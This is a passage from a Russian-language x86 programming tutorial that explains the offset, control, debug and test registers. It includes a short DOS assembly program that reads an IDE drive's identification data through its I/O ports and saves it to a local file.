Регистры оффсета — EIP, ESP, EBP, ESI, EDI. Эти регистры 32-х битные, нижняя половина которых доступна как регистры IP, SP, BP, SI, DI.

EIP — указатель команд, и содержит оффсет (величину смещения относительно начала программы) на линию кода, которая будет исполняться следующей. То есть полный адрес на следующую исполняемую линию кода будет CS:ЕIP.
Регистр ESP указывает на адрес вершины стека (адрес, куда будет заноситься следующая переменная командой PUSH).
Регистр ЕВР содержит адрес, начиная с которого в стек вносится или забирается информация (или \»глубина\» стека). Параметры функций имеют положительный сдвиг относительно ЕВР, локальные переменные — отрицательный сдвиг, а полный адрес этого участка памяти будет SS:EBP.
Регистр ESI — адрес источника, и содержит адрес начала блока информации для операции \»переместить блок\» (полный адрес DS:SI), а регистр EDI- адрес назначения в этой операции (полный адрес ES:EDI).
Регистры управления — CR0, CR1, CR2, CR3. Эти 32-х битные регистры устанавливают режим работы процессора (нормальный, защищенный и т.д.), постраничное распределение памяти и т.д. Они доступны только для программ в первом кольце памяти (Kernel, например). Трогать их не следует.

Регистры дебаггера — DR0, DR1, DR2, DR3, DR4, DR5, DR6, DR7. Первые четыре регистра содержат адреса на точки прерывания, остальные устанавливают, что должно произойти при достижении точки прерывания.

Контрольные регистры — TR6, TR7. Используются для контроля постраничной системы распределения памяти операционной системой. Нужны только если вы собираетесь написать свою ОС.

Как узнать сеpийный номеp, тип IDE винта?

.Model Tiny
.Code
Base_Port equ 1f0h
HD equ 0 ; Hard Disk number
.Startup
mov dx, Base_Port + 6
mov al, 10100000b or (HD shl 4)
out dx, al
jmp $ + 2
inc dx
mov al, 0ech
out dx, al
jmp $ + 2
@@Wait: in al, dx
jmp $ + 2
test al, 80h
jnz @@Wait
mov dx, Base_Port
lea di, Buffer
mov cx, 100h
@@1: in ax, dx
xchg ah, al
stosw
loop @@1
xor cx, cx
lea dx, Fname
mov ah, 3ch
int 21h
xchg bx, ax
lea dx, Buffer
mov cx, 100h
mov ah, 40h
int 21h
mov ah, 3eh
int 21h
ret

Fname db \’hdd_id.dat\’, 0
Buffer db 100h dup (?)

end